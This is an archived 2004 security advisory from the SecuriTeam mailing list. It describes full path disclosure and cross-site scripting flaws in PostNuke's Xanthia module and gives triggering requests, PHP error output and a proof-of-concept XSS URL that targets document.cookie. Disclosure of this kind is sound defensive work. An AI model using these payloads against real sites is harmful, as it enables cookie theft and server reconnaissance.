[UNIX] PostNuke Multiple Vulnerabilities In Xanthia Module

From: SecuriTeam (support_at_securiteam.com)
Date: 07/27/04

  • Next message: SecuriTeam: "[NT] Multiple Vulnerabilities in ASPRunner" 
    To: list@securiteam.com
Date: 27 Jul 2004 19:58:39 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      PostNuke Multiple Vulnerabilities In Xanthia Module
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.postnuke.com/> PostNuke is an open source, open development
    content management system (CMS). PostNuke started as a fork from PHPNuke (
    <http://www.phpnuke.org> http://www.phpnuke.org) and provides many
    enhancements and improvements over the PHP-Nuke system. PostNuke is still
    undergoing development but a large number of core functions are now
    stabilizing and a complete API for third-party developers is now in
    place."

    PostNuke's Xanthia module allows the full path to the system to be
    disclosed and cross site scripting attacks to be conducted.

    DETAILS

    Vulnerable Systems:
     * PostNuke version 0.75-RC3 with Xanthia module
     * PostNuke version 0.726-3 with Xanthia module

    Full Path Disclosure
    This vulnerability would allow a remote user to determine the full path to
    the web root directory and other potentially sensitive information.
    Issuing the following request to the server will yield an error message by
    PHP that will disclosure the information:
    http://localhost/html/modules/Xanthia/pnadmin.php

    Fatal error: Call to undefined function: pnmodgetvar() in
    c:\appserv\www\html\modules\xanthia\pnadmin.php on line 53

    http://localhost/html/modules/Xanthia/pnuserapi.php

    Fatal error: Call to undefined function: pnmodgetvar() in
    c:\appserv\www\html\modules\xanthia\pnuserapi.php on line 49

    Cross Site Scripting
    Cross site scripting is possible in PostNuke's Xanthia module. It can be
    seen in the showcontent() function, line 896:
     echo "<p><span
        class=\"pn-title\"><strong><em>".pnVarPrepForDisplay($title)."
        </em></strong></span><br />";
        echo "<p align=\"justify\"><span class=\"pn-normal\">";
        if ($cover != "")

    A proof of concept example for the XSS issue might be:
    http://localhost/html/modules.php?op=modload&name=Reviews&file=index&req=showcontent&id=1&title=%253cscr!pt>alert%2528document.cookie);%253c/scr!pt>

    The proof of concept result will cause the following to be displayed
    (provided as a screenshot):
    <http://www.swp-zone.org/archivos/post-nuke.gif>
    http://www.swp-zone.org/archivos/post-nuke.gif

    Vendor Status:
    Vendors were contacted many weeks ago and plan to release a fixed version
    soon. Check the PostNuke website for updates and official release details.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:darkbicho@fastmail.fm>
    DarkBicho.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] Multiple Vulnerabilities in ASPRunner"

    Relevant Pages